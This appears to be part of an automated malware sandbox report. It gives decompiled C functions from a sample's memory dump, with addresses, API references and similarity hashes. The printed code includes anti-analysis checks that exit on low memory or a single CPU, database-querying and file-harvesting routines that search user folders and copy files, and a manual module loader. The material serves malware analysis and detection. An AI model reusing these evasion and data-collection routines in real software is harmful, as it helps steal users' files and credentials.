Instruction Fuzzy Hash: C3118FB1500909EBDB20CF94C944BAFB7E8FB04344F5444269541E22C1C7BD9E45DFD9

Uniqueness

Uniqueness Score: -1.00%

Function 0040B505 Relevance: 3.1, APIs: 2, Instructions: 55stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 0040B520
strtok_s.MSVCRT ref: 0040B56F

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: strtok_s
String ID:
API String ID: 3330995566-0
Opcode ID: 16fb92cc18d8a3257de3ba316ce6e01cd4a413dd4ca6627a3f5d83c5759c6762
Instruction ID: d8a961e6302a3853870ad828977e92a6846f98b4bbc92c17e41490b25e701183
Opcode Fuzzy Hash: 16fb92cc18d8a3257de3ba316ce6e01cd4a413dd4ca6627a3f5d83c5759c6762
Instruction Fuzzy Hash: 54114F76900208BBCF10EFE8CC41ADD7BB4FF08344F104466FA14A32A1E7359A149B98

Uniqueness

Uniqueness Score: -1.00%

Function 0040111D Relevance: 3.0, APIs: 2, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040111D() {
				unsigned int _v60;
				signed int _v64;
				intOrPtr _v68;
				unsigned int _t7;
				struct _MEMORYSTATUSEX* _t8;
				unsigned int _t9;
				unsigned int _t10;
				intOrPtr _t11;
				signed int _t12;
				signed int _t14;
				struct _MEMORYSTATUSEX* _t16;
				unsigned int _t21;

				_t16 = (_t14 & 0xfffffff8) - 0x40;
				_t7 = 0;
				_t11 = 0x40;
				do {
					 *((char*)(_t16 + _t7)) = 0;
					if (_t7 != 0) goto L2;
					_t7 = _t7 + 1;
				} while (_t7 < _t11);
				_t8 = _t16;
				_v68 = _t11;
				GlobalMemoryStatusEx(_t8); // executed
				if(_t8 != 1) {
					_t12 = 0;
					_t9 = 0;
				} else {
					_t10 = _v60;
					_t12 = (_t10 << 0x00000020 | _v64) >> 0x14;
					_t9 = _t10 >> 0x14;
				}
				_t21 = _t9;
				if(_t21 <= 0 && (_t21 < 0 || _t12 < 0x457)) {
					ExitProcess(0);
				}
				return _t9;
			}

0x00401123
0x00401128
0x0040112a
0x0040112b
0x0040112b
0x00401131
0x00401133
0x00401134
0x00401138
0x0040113c
0x00401140
0x00401149
0x0040115c
0x0040115e
0x0040114b
0x0040114b
0x00401153
0x00401157
0x00401157
0x00401160
0x00401162
0x00401170
0x00401170
0x00401179

APIs

GlobalMemoryStatusEx.KERNEL32(00000001), ref: 00401140
ExitProcess.KERNEL32 ref: 00401170

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: ExitGlobalMemoryProcessStatus
String ID:
API String ID: 803317263-0
Opcode ID: ee91f5bfa5dd0ff58b2a5ed40c791426806b4a667bb793644eb491a747736f43
Instruction ID: 084f0052bdd8865dc7a76882bca1183b376f7ea019748122a92cf4783d30344a
Opcode Fuzzy Hash: ee91f5bfa5dd0ff58b2a5ed40c791426806b4a667bb793644eb491a747736f43
Instruction Fuzzy Hash: FDF0B4302187058BE71CAA74DD0575EB3E8D749310F10893FEB96D53E0EA38D800815E

Uniqueness

Uniqueness Score: -1.00%

Function 00401091 Relevance: 3.0, APIs: 2, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401091() {
				intOrPtr _v20;
				char _v40;
				struct _SYSTEM_INFO* _t3;

				_t3 =  &_v40;
				GetSystemInfo(_t3); // executed
				if(_v20 < 2) {
					ExitProcess(0);
				}
				return _t3;
			}

0x00401097
0x0040109b
0x004010a5
0x004010a9
0x004010a9
0x004010b0

APIs

GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0040DF7D), ref: 0040109B
ExitProcess.KERNEL32 ref: 004010A9

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: d28efbfa8a4959756c8e8272ba6eed14f59daffc177bee4aac8cd784f24ade24
Instruction ID: 5b1891cadc0f5871c0c7d943270eefb8ede5e74e94bf3f0d97d32b316e0cff89
Opcode Fuzzy Hash: d28efbfa8a4959756c8e8272ba6eed14f59daffc177bee4aac8cd784f24ade24
Instruction Fuzzy Hash: 10C01230904209DBCB00EBB19E0E6CEB6FAB744306FC01463E107A10A0D774E545CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 00406505 Relevance: 2.7, APIs: 2, Instructions: 163
stringCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E00406505(void* __ecx, void* __eflags, intOrPtr _a4, char _a16, char _a28, char _a40, intOrPtr _a120) {
				char _v8;
				char _v12;
				char _v24;
				char _v36;
				char _v48;
				char _v60;
				char _v72;
				char _v84;
				char _v96;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t59;
				char _t77;
				void* _t80;
				void* _t93;
				void* _t97;
				void* _t98;
				void* _t109;
				void* _t135;
				void* _t140;
				void* _t142;
				intOrPtr* _t147;
				void* _t167;
				void* _t168;

				_t135 = __ecx;
				_t147 =  &_v36;
				E004100ED(_t147, __eflags, 0x411be1);
				_t173 = _a120;
				_push( *0x615248);
				_t59 = _t147;
				if(_a120 == 0) {
					E0041018C(E00410208(E004101C6(E00410208(E004101C6(E00410208(E00410208(_t59, _t135,  &_v96, __eflags,  *0x615328), _t135,  &_v84, __eflags, 0x411be4), _t135,  &_a28,  &_v24, __eflags), _t135,  &_v48, __eflags, "_"), _t135,  &_a16,  &_v60, __eflags), _t135,  &_v72, __eflags), _t135,  &_v36);
					E00401859(_v72);
					E00401859(_v60);
					E00401859(_v48);
					E00401859(_v24);
					E00401859(_v84);
					_t77 = _v96;
				} else {
					E0041018C(E00410208(E004101C6(E00410208(E00410208(_t59, _t135,  &_v72, _t173,  *0x615328), _t135,  &_v60, _t173, 0x411be4), _t135,  &_a28,  &_v48, _t173), _t135,  &_v24, _t173), _t135,  &_v36);
					E00401859(_v24);
					E00401859(_v48);
					E00401859(_v60);
					_t77 = _v72;
				}
				E00401859(_t77);
				_t80 =  *0x6155c0(_a4,  &_v12); // executed
				if(_t80 == 0) {
					_t93 =  *0x61557c(_v12,  *0x615308, 0xffffffff,  &_v8, _t80); // executed
					_t168 = _t167 + 0x14;
					_t175 = _t93;
					if(_t93 == 0) {
						E004100ED( &_v24, _t175, 0x411be1);
						while(1) {
							_t97 =  *0x615598(_v8);
							_pop(_t140);
							if(_t97 != 0x64) {
								break;
							}
							_t98 =  *0x6155b4(_v8, 0);
							_pop(_t142);
							E0041018C(E00410208( &_v24, _t142,  &_v96, __eflags, _t98), _t142,  &_v24);
							E00401859(_v96);
							E0041018C(E00410208( &_v24, _t142,  &_v84, __eflags, "\n"), _t142,  &_v24);
							E00401859(_v84);
						}
						_t109 =  *0x61567c(_v24);
						_t177 = _t109 - 5;
						if(_t109 > 5) {
							_push( *0x61567c(_v24));
							_push(_v24);
							_t169 = _t168 - 0xc;
							E0041011F( &_v36, _t140, _t168 - 0xc, _t177);
							E004016EB( &_a40, _t169 - 0x50);
							_push( &_v96);
							E00403F95(_t140, _t177);
							E00401859(_v96);
						}
						E00401859(_v24);
						E00401859(0);
					}
					 *0x61559c(_v8);
					 *0x6155c4(_v12); // executed
				}
				E00401859(_v36);
				E00401859(0);
				E00401859(_a4);
				E00401859(_a16);
				E00401859(_a28);
				return E004016CC( &_a40);
			}

0x00406505
0x00406514
0x00406517
0x0040651c
0x00406520
0x00406526
0x00406528
0x004065c6
0x004065ce
0x004065d6
0x004065de
0x004065e6
0x004065ee
0x004065f3
0x0040652a
0x0040655b
0x00406563
0x0040656b
0x00406573
0x00406578
0x00406578
0x004065f6
0x00406602
0x0040660c
0x00406622
0x00406628
0x0040662b
0x0040662d
0x00406637
0x00406687
0x0040668a
0x00406690
0x00406694
0x00000000
0x00000000
0x00406643
0x0040664a
0x0040665a
0x00406662
0x0040667a
0x00406682
0x00406682
0x00406699
0x0040669f
0x004066a2
0x004066ad
0x004066ae
0x004066b4
0x004066b9
0x004066c6
0x004066ce
0x004066cf
0x004066da
0x004066da
0x004066e2
0x004066e9
0x004066e9
0x004066f1
0x004066fa
0x00406701
0x00406705
0x0040670c
0x00406714
0x0040671c
0x00406724
0x00406735

APIs

Part of subcall function 004100ED: lstrcpy.KERNEL32(00000000,00000000), ref: 00410113

lstrlen.KERNEL32(?,?), ref: 00406699
lstrlen.KERNEL32(?), ref: 004066A7

Part of subcall function 00410208: lstrlen.KERNEL32(H@A,76636410,?,0040E45B,00414048,00000000,00414048,00000000), ref: 0041021C
Part of subcall function 00410208: lstrcpy.KERNEL32(00000000,?), ref: 00410244
Part of subcall function 00410208: lstrcat.KERNEL32(?,00000000), ref: 0041024F

Part of subcall function 004101C6: lstrcpy.KERNEL32(00000000,?), ref: 004101F4
Part of subcall function 004101C6: lstrcat.KERNEL32(?,00000000), ref: 004101FE

Part of subcall function 0041018C: lstrcpy.KERNEL32(00000000,?), ref: 004101BC

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: fb6efe8fa2e4cc0259c6c8311764f7b42dd03dd4d3adaa0f56910dbc66a64084
Instruction ID: 490060582fe728c92b3aabf5a91a3bb07d80638680948aff8121f2d73e00e086
Opcode Fuzzy Hash: fb6efe8fa2e4cc0259c6c8311764f7b42dd03dd4d3adaa0f56910dbc66a64084
Instruction Fuzzy Hash: 5051F732D00119DBCF00FBA6ED469DDB775EF04308B11813BF516B71B1DA79AE868A98

Uniqueness

Uniqueness Score: -1.00%

Function 0040C163 Relevance: 2.6, APIs: 2, Instructions: 96
stringCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E0040C163(void* __eflags, char _a4) {
				void* _v8;
				char _v20;
				char _v284;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t24;
				void* _t71;
				void* _t73;
				void* _t74;
				void* _t75;
				void* _t76;

				_v8 =  &_v284;
				memset(_v8, 0, 0x104 << 0);
				_t24 = E0040EFE3( &_v20, 0x1a);
				 *0x61575c();
				E00401859(_v20);
				 *0x61575c();
				_t73 = _t71 + 0xc - 0x50;
				_t53 =  &_a4;
				E004016EB( &_a4, _t73);
				E0040BF33(0x411be1,  &_v284,  *0x615524,  *0x615300,  &_v284); // executed
				_t74 = _t73 + 0x10;
				E004016EB( &_a4, _t74);
				E0040BF33(0x411be1,  &_v284,  *0x6151d4,  *0x615300,  *0x61524c); // executed
				_t75 = _t74 + 0x10;
				E004016EB(_t53, _t75);
				E0040BF33(0x411be1,  &_v284,  *0x615380,  *0x615300,  &_v284);
				_t76 = _t75 + 0x10;
				E004016EB(_t53, _t76);
				E0040BF33(0x411be1,  &_v284,  *0x6152c0,  *0x615300,  *_t24);
				_t77 = _t76 + 0x10;
				E004016EB(_t53, _t76 + 0x10);
				_push( *0x615300);
				_push( *0x6153c4);
				_push( &_v284);
				E0040BF33();
				E004016EB(_t53, _t77 + 0x10);
				E0040BF33(0x411be1,  &_v284,  *0x615138,  *0x615300, 0x411be1);
				_v8 =  &_v284;
				memset(_v8, 0, 0x104 << 0);
				return E004016CC(_t53);
			}

0x0040c175
0x0040c182
0x0040c189
0x0040c198
0x0040c1a1
0x0040c1b3
0x0040c1b9
0x0040c1bc
0x0040c1c1
0x0040c1df
0x0040c1e4
0x0040c1e9
0x0040c202
0x0040c207
0x0040c20c
0x0040c225
0x0040c22a
0x0040c22f
0x0040c248
0x0040c24d
0x0040c252
0x0040c257
0x0040c263
0x0040c269
0x0040c26b
0x0040c275
0x0040c28e
0x0040c29c
0x0040c2a9
0x0040c2b6

APIs

Part of subcall function 0040EFE3: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,00411BE1,?), ref: 0040F014

lstrcat.KERNEL32(?,00000000), ref: 0040C198
lstrcat.KERNEL32(?), ref: 0040C1B3

Part of subcall function 0040BF33: wsprintfA.USER32 ref: 0040BF4E
Part of subcall function 0040BF33: FindFirstFileA.KERNEL32(?,?), ref: 0040BF65
Part of subcall function 0040BF33: StrCmpCA.SHLWAPI(?,00411BF0), ref: 0040BF83
Part of subcall function 0040BF33: StrCmpCA.SHLWAPI(?,00411BF4), ref: 0040BF9D
Part of subcall function 0040BF33: wsprintfA.USER32 ref: 0040BFC2
Part of subcall function 0040BF33: StrCmpCA.SHLWAPI(00411BE1,00411BE1), ref: 0040BFD3
Part of subcall function 0040BF33: wsprintfA.USER32 ref: 0040BFF0
Part of subcall function 0040BF33: PathMatchSpecA.SHLWAPI(?,?), ref: 0040C013
Part of subcall function 0040BF33: lstrcat.KERNEL32(?), ref: 0040C043
Part of subcall function 0040BF33: lstrcat.KERNEL32(?,00411BE4), ref: 0040C056
Part of subcall function 0040BF33: lstrcat.KERNEL32(?,?), ref: 0040C066
Part of subcall function 0040BF33: lstrcat.KERNEL32(?,00411BE4), ref: 0040C074
Part of subcall function 0040BF33: lstrcat.KERNEL32(?,?), ref: 0040C088
Part of subcall function 0040BF33: CopyFileA.KERNEL32(?,?,00000001), ref: 0040C09E

Part of subcall function 0040BF33: wsprintfA.USER32 ref: 0040C000
Part of subcall function 0040BF33: DeleteFileA.KERNEL32(?), ref: 0040C106
Part of subcall function 0040BF33: FindNextFileA.KERNEL32(?,?), ref: 0040C13F
Part of subcall function 0040BF33: FindClose.KERNEL32(?), ref: 0040C150

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID:
API String ID: 2104210347-0
Opcode ID: 825726293465e73a9cd43b274b2b99bddc4a02a59f56ba5101cfdbb78097302f
Instruction ID: e6f6563fbfb760a6d146238f045c53a434813425adc51711a9626d0a1db3caa4
Opcode Fuzzy Hash: 825726293465e73a9cd43b274b2b99bddc4a02a59f56ba5101cfdbb78097302f
Instruction Fuzzy Hash: 3431833280051DEFCB41AB90DC42ADEB7BAEB44308F4844A7F605A3162EB395B519FD9

Uniqueness

Uniqueness Score: -1.00%

Function 0040D186 Relevance: 2.6, APIs: 2, Instructions: 50
stringCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0040D186(void* __eflags, char _a4) {
				void* _v8;
				char _v20;
				char _v284;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t45;

				_v8 =  &_v284;
				memset(_v8, 0, 0x104 << 0);
				 *0x61575c( &_v284,  *((intOrPtr*)(E0040EFE3( &_v20, 0x1a))));
				E00401859(_v20);
				 *0x61575c( *0x615088);
				E004016EB( &_a4, _t45 + 0xc - 0x50);
				E0040BF33(0x411be1,  &_v284,  *0x6151dc,  *0x615060,  &_v284); // executed
				_v8 =  &_v284;
				memset(_v8, 0, 0x104 << 0);
				return E004016CC( &_a4);
			}

0x0040d198
0x0040d1a5
0x0040d1bb
0x0040d1c4
0x0040d1d6
0x0040d1e4
0x0040d201
0x0040d20f
0x0040d21c
0x0040d229

APIs

Part of subcall function 0040EFE3: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,00411BE1,?), ref: 0040F014

lstrcat.KERNEL32(?,00000000), ref: 0040D1BB
lstrcat.KERNEL32(?), ref: 0040D1D6

Part of subcall function 0040BF33: wsprintfA.USER32 ref: 0040BF4E
Part of subcall function 0040BF33: FindFirstFileA.KERNEL32(?,?), ref: 0040BF65
Part of subcall function 0040BF33: StrCmpCA.SHLWAPI(?,00411BF0), ref: 0040BF83
Part of subcall function 0040BF33: StrCmpCA.SHLWAPI(?,00411BF4), ref: 0040BF9D
Part of subcall function 0040BF33: wsprintfA.USER32 ref: 0040BFC2
Part of subcall function 0040BF33: StrCmpCA.SHLWAPI(00411BE1,00411BE1), ref: 0040BFD3
Part of subcall function 0040BF33: wsprintfA.USER32 ref: 0040BFF0
Part of subcall function 0040BF33: PathMatchSpecA.SHLWAPI(?,?), ref: 0040C013
Part of subcall function 0040BF33: lstrcat.KERNEL32(?), ref: 0040C043
Part of subcall function 0040BF33: lstrcat.KERNEL32(?,00411BE4), ref: 0040C056
Part of subcall function 0040BF33: lstrcat.KERNEL32(?,?), ref: 0040C066
Part of subcall function 0040BF33: lstrcat.KERNEL32(?,00411BE4), ref: 0040C074
Part of subcall function 0040BF33: lstrcat.KERNEL32(?,?), ref: 0040C088
Part of subcall function 0040BF33: CopyFileA.KERNEL32(?,?,00000001), ref: 0040C09E

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: lstrcat$wsprintf$FilePath$CopyFindFirstFolderMatchSpec
String ID:
API String ID: 800431183-0
Opcode ID: 036d4d6964bfb7e729c67b2bcb5c158990b534fc7ef96077e7e15d1b5e9c4ea8
Instruction ID: 01b0042e1c23141004c6008764d62a51d092fde9b7f60f0fc0ee35f6d0c64fde
Opcode Fuzzy Hash: 036d4d6964bfb7e729c67b2bcb5c158990b534fc7ef96077e7e15d1b5e9c4ea8
Instruction Fuzzy Hash: 2011617290010DEFCB00EBA4DC46ADDB7B9EF44304F144476E605E32A1EA359B959B94

Uniqueness

Uniqueness Score: -1.00%

Function 00405083 Relevance: 1.6, APIs: 1, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00405083(void* __ebx, void* __ecx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr* _v8;
				signed int _v12;
				signed int _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v40;
				intOrPtr _v168;
				intOrPtr* _v248;
				char _v352;
				void* __edi;
				void* __esi;
				intOrPtr* _t36;
				intOrPtr* _t37;
				intOrPtr _t42;
				intOrPtr* _t43;
				void* _t44;
				void* _t49;
				void* _t50;
				intOrPtr* _t51;
				intOrPtr* _t60;
				void* _t61;
				signed int _t69;

				if(E004051A6 != 0) {
					_t67 =  &_v352;
					_v40 = 0;
					_v20 = 0;
					_v12 = 0;
					_v16 = 0;
					_v8 = 0;
					_t36 = E00404C17(__ecx,  &_v352, __eflags, _a4);
					_t49 = _t61;
					__eflags = _t36;
					if(_t36 == 0) {
						_t36 = E00404CD0(_t49,  &_v352); // executed
						__eflags = _t36;
						if(__eflags == 0) {
							_t36 = E00404D75(_t49, _t67, __eflags, _a4);
							_pop(_t50);
							__eflags = _t36;
							if(_t36 == 0) {
								_t36 = E00404DF6(_t67);
								__eflags = _t36;
								if(_t36 == 0) {
									_push(__ebx);
									_t36 = E00404E9A(_t67);
									__eflags = _t36;
									if(_t36 == 0) {
										_t36 = E00404FE3(_t50, _t67); // executed
										__eflags = _t36;
										if(_t36 == 0) {
											_t51 = _v248;
											__eflags = _t51;
											if(_t51 == 0) {
												L11:
												_t37 = _a8;
												__eflags = _t37;
												if(_t37 == 0) {
													__eflags = _v20;
													if(_v20 != 0) {
														_t69 = 0;
														__eflags = _v16;
														if(_v16 > 0) {
															do {
																FreeLibrary( *(_v20 + _t69 * 4));
																_t69 = _t69 + 1;
																__eflags = _t69 - _v16;
															} while (_t69 < _v16);
														}
														E0040EE19(_v20);
													}
												} else {
													 *((intOrPtr*)(_t37 + 8)) = _v28;
													 *((intOrPtr*)(_t37 + 0xc)) = _v24;
													 *((intOrPtr*)(_t37 + 0x10)) = _v8;
													 *((intOrPtr*)(_t37 + 0x14)) = _v168;
													 *((intOrPtr*)(_t37 + 0x18)) = _v20;
													 *_t37 = 0x20;
													 *((intOrPtr*)(_t37 + 4)) = 0;
													 *((intOrPtr*)(_t37 + 0x1c)) = _v16;
												}
												__eflags = _v40;
												if(_v40 != 0) {
													E0040EE19(_v40);
												}
												_t36 = 0;
												__eflags = 0;
											} else {
												_t42 = _v28;
												_t60 = _t51 + _t42;
												_v8 = _t60;
												_t43 =  *_t60(_t42, 1, 0);
												__eflags = _t43;
												if(_t43 != 0) {
													goto L11;
												} else {
													_t36 = 0xa;
												}
											}
										}
									}
								}
							}
						}
					}
					return _t36;
				} else {
					_t44 = 0xfffffffe;
					return _t44;
				}
			}

0x00405093
0x004050a1
0x004050a7
0x004050aa
0x004050ad
0x004050b0
0x004050b3
0x004050b6
0x004050bb
0x004050bc
0x004050be
0x004050c4
0x004050c9
0x004050cb
0x004050d4
0x004050d9
0x004050da
0x004050dc
0x004050e2
0x004050e7
0x004050e9
0x004050ef
0x004050f2
0x004050f8
0x004050fa
0x00405102
0x00405109
0x0040510b
0x00405111
0x00405117
0x00405119
0x00405132
0x00405132
0x00405135
0x00405137
0x0040516b
0x0040516e
0x00405170
0x00405172
0x00405175
0x00405177
0x0040517d
0x00405183
0x00405184
0x00405184
0x00405177
0x0040518c
0x00405191
0x00405139
0x0040513c
0x00405142
0x00405148
0x00405151
0x00405157
0x0040515d
0x00405163
0x00405166
0x00405166
0x00405192
0x00405195
0x0040519a
0x0040519f
0x004051a0
0x004051a0
0x0040511b
0x0040511b
0x00405121
0x00405124
0x00405127
0x00405129
0x0040512b
0x00000000
0x0040512d
0x0040512f
0x0040512f
0x0040512b
0x00405119
0x0040510b
0x004050fa
0x004050e9
0x004050dc
0x004050cb
0x004051a5
0x00405095
0x00405097
0x00405099
0x00405099

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7bcab4642cd073e6d84810e926dc3e2ff0730e39d1170f00758ba0b89cf8f0f
Instruction ID: 74bea1c6295c0c53ecf6e4f3c24677e0971c1b12bfabd5c17c837faa0bc1ea75
Opcode Fuzzy Hash: a7bcab4642cd073e6d84810e926dc3e2ff0730e39d1170f00758ba0b89cf8f0f
Instruction Fuzzy Hash: E5315A75E00A149FCB16DF56D840AAFBBB2EFC4310F24416BE415FB391D6388E418E88

Uniqueness

Uniqueness Score: -1.00%

Function 0040EFE3 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040EFE3(void* __eax, intOrPtr _a4) {
				void* _v8;
				char _v1008;
				void* __esi;
				void* _t20;
				void* _t24;

				_t24 = __eax;
				_v8 =  &_v1008;
				memset(_v8, 0, 0x3e8 << 0);
				 *0x615744(0, _a4, 0, 0,  &_v1008, _t20); // executed
				E004100ED(_t24, 0,  &_v1008);
				return _t24;
			}

0x0040efed
0x0040eff6
0x0040f003
0x0040f014
0x0040f021
0x0040f02b

APIs

SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,00411BE1,?), ref: 0040F014

Part of subcall function 004100ED: lstrcpy.KERNEL32(00000000,00000000), ref: 00410113

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: 8b34da925a98c83e18d95d82f58510c1d0919b96e1b35ff73307ea6c76b3c005
Instruction ID: 177d6456e52725c237371dabac4674f39e89a3fc961c4739b0405b02b89d0303
Opcode Fuzzy Hash: 8b34da925a98c83e18d95d82f58510c1d0919b96e1b35ff73307ea6c76b3c005
